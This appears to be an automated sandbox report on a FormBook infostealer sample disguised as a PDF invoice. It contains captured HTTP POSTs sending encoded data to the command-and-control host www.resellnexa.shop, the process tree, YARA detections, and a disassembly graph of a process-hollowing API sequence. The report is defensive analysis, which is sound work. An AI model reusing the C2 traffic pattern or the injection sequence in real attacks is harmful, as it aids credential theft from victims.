                                Oct 2, 2024 02:06:49.661814928 CEST720INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Wed, 02 Oct 2024 00:06:49 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 555
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.45683352.223.13.41804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:54.982444048 CEST767OUTPOST /sfpe/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 199
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.resellnexa.shop
                                Origin: http://www.resellnexa.shop
                                Referer: http://www.resellnexa.shop/sfpe/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 68 64 4a 6a 2b 55 75 38 64 5a 34 79 78 39 70 35 61 39 44 62 66 6a 64 6c 2b 79 33 33 45 75 49 64 59 72 6b 66 31 57 4c 4b 5a 5a 44 37 75 5a 44 30 44 31 62 62 4f 69 33 62 4b 6b 68 33 78 4b 4f 68 66 43 62 79 67 2f 43 36 50 6a 42 51 4e 48 2b 58 34 2b 64 6e 42 34 47 45 39 47 55 56 6a 6d 48 6e 41 61 62 73 48 79 6a 6b 6c 35 4e 4b 34 79 58 62 73 56 68 5a 51 55 67 6e 74 59 75 48 74 76 31 30 2f 4b 33 77 31 50 4c 4a 70 33 49 53 75 2b 65 2b 55 54 32 6e 6e 73 6b 67 72 58 38 51 66 30 73 41 44 76 34 62 53 69 4a 57 41 6f 4c 7a 50 50 2f 47 54 39 35 43 63 77 54 30 6d 4d 6b 6c 55 78 74 58 4f 77 3d 3d
                                Data Ascii: -L=hdJj+Uu8dZ4yx9p5a9Dbfjdl+y33EuIdYrkf1WLKZZD7uZD0D1bbOi3bKkh3xKOhfCbyg/C6PjBQNH+X4+dnB4GE9GUVjmHnAabsHyjkl5NK4yXbsVhZQUgntYuHtv10/K3w1PLJp3ISu+e+UT2nnskgrX8Qf0sADv4bSiJWAoLzPP/GT95CcwT0mMklUxtXOw==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.45683452.223.13.41804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:06:57.529119968 CEST787OUTPOST /sfpe/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 219
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.resellnexa.shop
                                Origin: http://www.resellnexa.shop
                                Referer: http://www.resellnexa.shop/sfpe/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 68 64 4a 6a 2b 55 75 38 64 5a 34 79 78 59 68 35 57 39 2f 62 49 7a 64 6b 69 69 33 33 66 2b 49 6a 59 72 6f 66 31 53 53 56 59 72 6e 37 75 34 7a 30 43 33 7a 62 4a 69 33 62 53 30 68 79 73 36 4f 51 66 43 65 42 67 2b 2b 36 50 6a 6c 51 4e 47 69 58 34 4e 31 6b 41 6f 47 47 77 6d 55 74 74 47 48 6e 41 61 62 73 48 79 33 4f 6c 35 46 4b 37 42 66 62 2b 48 5a 61 54 55 67 6b 39 49 75 48 70 76 31 77 2f 4b 33 6f 31 4f 58 33 70 31 41 53 75 2f 75 2b 55 47 57 6b 74 73 6c 72 76 58 39 5a 57 48 64 57 46 39 42 67 55 77 6c 79 49 73 36 53 4f 4a 75 63 43 4d 59 56 4f 77 33 48 37 4c 74 52 5a 79 51 65 56 7a 41 73 71 47 53 33 68 67 4c 64 72 46 72 6c 55 77 41 75 51 6c 63 3d
                                Data Ascii: -L=hdJj+Uu8dZ4yxYh5W9/bIzdkii33f+IjYrof1SSVYrn7u4z0C3zbJi3bS0hys6OQfCeBg++6PjlQNGiX4N1kAoGGwmUttGHnAabsHy3Ol5FK7Bfb+HZaTUgk9IuHpv1w/K3o1OX3p1ASu/u+UGWktslrvX9ZWHdWF9BgUwlyIs6SOJucCMYVOw3H7LtRZyQeVzAsqGS3hgLdrFrlUwAuQlc=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.45683552.223.13.41804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:07:00.076556921 CEST10869OUTPOST /sfpe/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Connection: close
                                Cache-Control: max-age=0
                                Content-Length: 10299
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.resellnexa.shop
                                Origin: http://www.resellnexa.shop
                                Referer: http://www.resellnexa.shop/sfpe/
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Data Raw: 2d 4c 3d 68 64 4a 6a 2b 55 75 38 64 5a 34 79 78 59 68 35 57 39 2f 62 49 7a 64 6b 69 69 33 33 66 2b 49 6a 59 72 6f 66 31 53 53 56 59 72 76 37 76 4b 37 30 41 57 7a 62 49 69 33 62 62 55 68 7a 73 36 4f 33 66 43 6d 65 67 2b 79 41 50 6c 68 51 66 55 71 58 77 63 31 6b 4a 6f 47 47 35 47 55 57 6a 6d 48 32 41 5a 6a 6f 48 79 6e 4f 6c 35 46 4b 37 41 76 62 75 6c 68 61 56 55 67 6e 74 59 75 44 74 76 31 59 2f 4b 2f 53 31 4f 54 6e 6f 45 67 53 75 66 2b 2b 53 79 32 6b 76 4d 6c 70 69 33 39 42 57 48 51 49 46 39 63 62 55 30 6c 4d 49 72 4b 53 4d 34 62 61 42 6f 73 61 59 53 6a 31 6f 4c 45 77 59 43 73 61 64 55 45 78 37 45 48 71 31 53 43 31 76 53 4f 4d 51 7a 41 33 4c 79 33 51 65 39 36 63 4d 4a 49 45 61 42 30 4f 47 56 6b 72 33 6a 4b 37 62 5a 54 32 45 77 32 6f 36 57 33 67 33 53 65 68 6a 2b 66 65 30 56 39 48 77 65 6e 44 4a 44 76 34 2f 46 6c 43 32 77 78 65 67 38 33 50 77 4a 42 76 4f 62 55 57 72 57 65 51 44 38 70 53 68 58 66 66 2b 35 47 74 78 2b 4d 34 51 77 72 36 4a 78 48 36 52 71 6c 67 56 65 57 5a 76 48 7a 58 56 49 56 6f 72 36 5a [TRUNCATED]
                                Data Ascii: -L=hdJj+Uu8dZ4yxYh5W9/bIzdkii33f+IjYrof1SSVYrv7vK70AWzbIi3bbUhzs6O3fCmeg+yAPlhQfUqXwc1kJoGG5GUWjmH2AZjoHynOl5FK7AvbulhaVUgntYuDtv1Y/K/S1OTnoEgSuf++Sy2kvMlpi39BWHQIF9cbU0lMIrKSM4baBosaYSj1oLEwYCsadUEx7EHq1SC1vSOMQzA3Ly3Qe96cMJIEaB0OGVkr3jK7bZT2Ew2o6W3g3Sehj+fe0V9HwenDJDv4/FlC2wxeg83PwJBvObUWrWeQD8pShXff+5Gtx+M4Qwr6JxH6RqlgVeWZvHzXVIVor6ZEtfcpyaTG9nY/ZvNwUeMLP/yvCJ3zBoQRhCgyYjN9I+Bpay5dMd7vQH9V5WqAca5RJY2pc16RauzU3g0vYJrtxhEO9vVd6DfX4dLVQ0GdBLd4cT1vcx5HLMHav/Ujso0C5Gz6el0UjDcsKPZHUDT+X2zY3EGp1uj81kF+lRjOm8UnUYfVOl6m5Wz5L7e7Aa0J1Qzc5CDhyPpfCj80CZlCiYJ8Qf+ulE74zKBXMx1bu83s3r+gqVFwAZoDfeNuOsnZYVMTkoDM865RlNrsWpX8nGGeiOlHM5MGPT1kv+ATiauWlsHJ8YKRlDGn/ytBD9HOCKB7wrW1hukCIj3eOkQ+STcAhLZOmRyOly/mNtCW5b/ZwRQMFl1JCHaM/ptlO8lAZvqGi8sI+dQgslpe+r5HNsR74GYvW8h+JEFaBq0A6sP2hNbtdbt+jDOdGn3VjOGHnwhqcW7jhtPYzeSKkehIakirc4AVtgZlk9+jSlnc1x656HGulENDR7hSCIrxWj7rl47zH47iBcjpVdBe/w/QoY43Zpp4uteKU8QoIx+C5Zlm8EzD864PYgTcHaOXySmd4EMkerwgRQcnvCLgPJYiyXbfmpPEjT0JZgR1YnZgxc7Ez6Uh4lZIVMQEy09+2A8SOZShzH60jZZIhbPu9pmg68482Se3O3lsh [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.45683652.223.13.41804248C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                TimestampBytes transferredDirectionData
                                Oct 2, 2024 02:07:02.813785076 CEST500OUTGET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-us
                                Connection: close
                                Host: www.resellnexa.shop
                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
                                Oct 2, 2024 02:07:03.289639950 CEST398INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Wed, 02 Oct 2024 00:07:03 GMT
                                Content-Type: text/html
                                Content-Length: 258
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4c 3d 73 66 68 44 39 6b 61 31 66 37 5a 6c 2b 71 4e 72 44 4d 6a 39 4b 51 5a 6e 6e 68 75 55 53 50 41 72 41 4b 51 36 30 47 48 51 54 37 7a 47 6f 71 72 31 4d 46 76 65 42 67 37 2f 54 51 31 52 32 38 65 61 55 31 6d 46 68 74 36 53 4f 53 31 76 59 47 79 6c 35 76 35 73 57 61 2b 56 67 6d 63 61 67 31 72 59 4a 36 62 5a 47 68 37 38 70 61 5a 67 37 51 48 35 6d 55 56 6a 64 52 67 3d 26 35 6c 46 6c 3d 41 68 6f 48 62 56 56 38 77 38 46 68 6f 76 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov"}</script></head></html>


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:20:04:58
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
                                Imagebase:0x220000
                                File size:767'488 bytes
                                MD5 hash:7D3EE1A73D9FBEF171C785801FFCAFF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:2
                                Start time:20:04:59
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
                                Imagebase:0x10000
                                File size:767'488 bytes
                                MD5 hash:7D3EE1A73D9FBEF171C785801FFCAFF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:20:04:59
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
                                Imagebase:0xf20000
                                File size:767'488 bytes
                                MD5 hash:7D3EE1A73D9FBEF171C785801FFCAFF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:7
                                Start time:20:05:47
                                Start date:01/10/2024
                                Path:C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe"
                                Imagebase:0xb30000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:20:05:49
                                Start date:01/10/2024
                                Path:C:\Windows\SysWOW64\RpcPing.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                Imagebase:0x100000
                                File size:26'624 bytes
                                MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:false

                                General

                                Target ID:9
                                Start time:20:06:03
                                Start date:01/10/2024
                                Path:C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe"
                                Imagebase:0xb30000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:10
                                Start time:20:06:15
                                Start date:01/10/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff6bf500000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:142
                                  Total number of Limit Nodes:12
                                  execution_graph 20426 d6d690 DuplicateHandle 20427 d6d726 20426->20427 20428 d6acb0 20432 d6ad97 20428->20432 20437 d6ada8 20428->20437 20429 d6acbf 20433 d6addc 20432->20433 20434 d6adb9 20432->20434 20433->20429 20434->20433 20435 d6afe0 GetModuleHandleW 20434->20435 20436 d6b00d 20435->20436 20436->20429 20438 d6addc 20437->20438 20439 d6adb9 20437->20439 20438->20429 20439->20438 20440 d6afe0 GetModuleHandleW 20439->20440 20441 d6b00d 20440->20441 20441->20429 20442 70e6c18 20443 70e6da3 20442->20443 20444 70e6c3e 20442->20444 20444->20443 20446 70e3158 20444->20446 20447 70e6e98 PostMessageW 20446->20447 20448 70e6f04 20447->20448 20448->20444 20449 d6d040 20450 d6d086 GetCurrentProcess 20449->20450 20452 d6d0d1 20450->20452 20453 d6d0d8 GetCurrentThread 20450->20453 20452->20453 20454 d6d115 GetCurrentProcess 20453->20454 20455 d6d10e 20453->20455 20456 d6d14b GetCurrentThreadId 20454->20456 20455->20454 20458 d6d1a4 20456->20458 20459 70e4fb3 20460 70e4f54 20459->20460 20461 70e50ae 20460->20461 20463 70e5933 20460->20463 20464 70e5952 20463->20464 20475 70e5976 20464->20475 20479 70e636e 20464->20479 20484 70e6034 20464->20484 20489 70e62b4 20464->20489 20494 70e6217 20464->20494 20498 70e617f 20464->20498 20503 70e5f41 20464->20503 20509 70e5d00 20464->20509 20515 70e5d43 20464->20515 20521 70e5ee5 20464->20521 20529 70e6107 20464->20529 20534 70e6288 20464->20534 20539 70e5fab 20464->20539 20544 70e5ead 20464->20544 20475->20461 20480 70e6374 20479->20480 20549 70e4228 20480->20549 20553 70e4230 20480->20553 20481 70e639a 20485 70e603d 20484->20485 20557 70e48ab 20485->20557 20561 70e48b0 20485->20561 20486 70e61b9 20486->20475 20490 70e6463 20489->20490 20492 70e48ab WriteProcessMemory 20490->20492 20493 70e48b0 WriteProcessMemory 20490->20493 20491 70e67fa 20492->20491 20493->20491 20565 70e4718 20494->20565 20569 70e4713 20494->20569 20495 70e6231 20499 70e5fc2 20498->20499 20499->20498 20500 70e5e61 20499->20500 20501 70e48ab WriteProcessMemory 20499->20501 20502 70e48b0 WriteProcessMemory 20499->20502 20500->20475 20501->20499 20502->20499 20504 70e5f47 20503->20504 20505 70e6334 20504->20505 20507 70e4228 ResumeThread 20504->20507 20508 70e4230 ResumeThread 20504->20508 20505->20475 20506 70e639a 20507->20506 20508->20506 20511 70e5d29 20509->20511 20510 70e5d40 20510->20475 20511->20510 20573 70e4b38 20511->20573 20577 70e4b33 20511->20577 20516 70e5d40 20515->20516 20517 70e5d33 20515->20517 20516->20475 20517->20516 20519 70e4b38 CreateProcessA 20517->20519 20520 70e4b33 CreateProcessA 20517->20520 20518 70e5e39 20518->20475 20519->20518 20520->20518 20522 70e5eeb 20521->20522 20523 70e5ec4 20522->20523 20525 70e4718 Wow64SetThreadContext 20522->20525 20526 70e4713 Wow64SetThreadContext 20522->20526 20524 70e66ed 20523->20524 20581 70e4998 20523->20581 20585 70e49a0 20523->20585 20524->20475 20525->20523 20526->20523 20530 70e649f 20529->20530 20589 70e47e8 20530->20589 20593 70e47f0 20530->20593 20531 70e64bd 20535 70e5ec4 20534->20535 20536 70e66ed 20535->20536 20537 70e4998 ReadProcessMemory 20535->20537 20538 70e49a0 ReadProcessMemory 20535->20538 20536->20475 20537->20535 20538->20535 20540 70e5fb1 20539->20540 20541 70e5e61 20540->20541 20542 70e48ab WriteProcessMemory 20540->20542 20543 70e48b0 WriteProcessMemory 20540->20543 20541->20475 20542->20540 20543->20540 20545 70e5eb3 20544->20545 20546 70e66ed 20545->20546 20547 70e4998 ReadProcessMemory 20545->20547 20548 70e49a0 ReadProcessMemory 20545->20548 20546->20475 20547->20545 20548->20545 20550 70e4230 ResumeThread 20549->20550 20552 70e42a1 20550->20552 20552->20481 20554 70e4270 ResumeThread 20553->20554 20556 70e42a1 20554->20556 20556->20481 20558 70e48f8 WriteProcessMemory 20557->20558 20560 70e494f 20558->20560 20560->20486 20562 70e48f8 WriteProcessMemory 20561->20562 20564 70e494f 20562->20564 20564->20486 20566 70e475d Wow64SetThreadContext 20565->20566 20568 70e47a5 20566->20568 20568->20495 20570 70e475d Wow64SetThreadContext 20569->20570 20572 70e47a5 20570->20572 20572->20495 20574 70e4bc1 CreateProcessA 20573->20574 20576 70e4d83 20574->20576 20578 70e4bc1 CreateProcessA 20577->20578 20580 70e4d83 20578->20580 20582 70e49a1 ReadProcessMemory 20581->20582 20584 70e4a2f 20582->20584 20584->20523 20586 70e49eb ReadProcessMemory 20585->20586 20588 70e4a2f 20586->20588 20588->20523 20590 70e4830 VirtualAllocEx 20589->20590 20592 70e486d 20590->20592 20592->20531 20594 70e4830 VirtualAllocEx 20593->20594 20596 70e486d 20594->20596 20596->20531 20597 d64668 20598 d6467a 20597->20598 20599 d64686 20598->20599 20601 d64778 20598->20601 20602 d6479d 20601->20602 20606 d64888 20602->20606 20610 d64879 20602->20610 20608 d648af 20606->20608 20607 d6498c 20607->20607 20608->20607 20614 d644b4 20608->20614 20611 d648af 20610->20611 20612 d644b4 CreateActCtxA 20611->20612 20613 d6498c 20611->20613 20612->20613 20615 d65918 CreateActCtxA 20614->20615 20617 d659db 20615->20617

                                  Executed Functions

                                  Function 00D6D03A Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 d6d03a-d6d0cf GetCurrentProcess 298 d6d0d1-d6d0d7 294->298 299 d6d0d8-d6d10c GetCurrentThread 294->299 298->299 300 d6d115-d6d149 GetCurrentProcess 299->300 301 d6d10e-d6d114 299->301 302 d6d152-d6d16a 300->302 303 d6d14b-d6d151 300->303 301->300 307 d6d173-d6d1a2 GetCurrentThreadId 302->307 303->302 308 d6d1a4-d6d1aa 307->308 309 d6d1ab-d6d20d 307->309 308->309
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D0BE
                                  • GetCurrentThread.KERNEL32 ref: 00D6D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D138
                                  • GetCurrentThreadId.KERNEL32 ref: 00D6D191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 9d5547500c4b44e9a343e7a530ad0edcd58da04e0ed37513767335de987a3b85
                                  • Instruction ID: ff1bcdd55c549c19d283ced6501eb4b122c26868029103b0404cf2a3bec45bd9
                                  • Opcode Fuzzy Hash: 9d5547500c4b44e9a343e7a530ad0edcd58da04e0ed37513767335de987a3b85
                                  • Instruction Fuzzy Hash: B35188B0D003098FDB14DFA9D948B9EBBF2EF49314F248459E409A7350DB78A944CF61
                                  Function 00D6D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 315 d6d040-d6d0cf GetCurrentProcess 319 d6d0d1-d6d0d7 315->319 320 d6d0d8-d6d10c GetCurrentThread 315->320 319->320 321 d6d115-d6d149 GetCurrentProcess 320->321 322 d6d10e-d6d114 320->322 323 d6d152-d6d16a 321->323 324 d6d14b-d6d151 321->324 322->321 328 d6d173-d6d1a2 GetCurrentThreadId 323->328 324->323 329 d6d1a4-d6d1aa 328->329 330 d6d1ab-d6d20d 328->330 329->330
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D0BE
                                  • GetCurrentThread.KERNEL32 ref: 00D6D0FB
                                  • GetCurrentProcess.KERNEL32 ref: 00D6D138
                                  • GetCurrentThreadId.KERNEL32 ref: 00D6D191
                                  Memory Dump Source
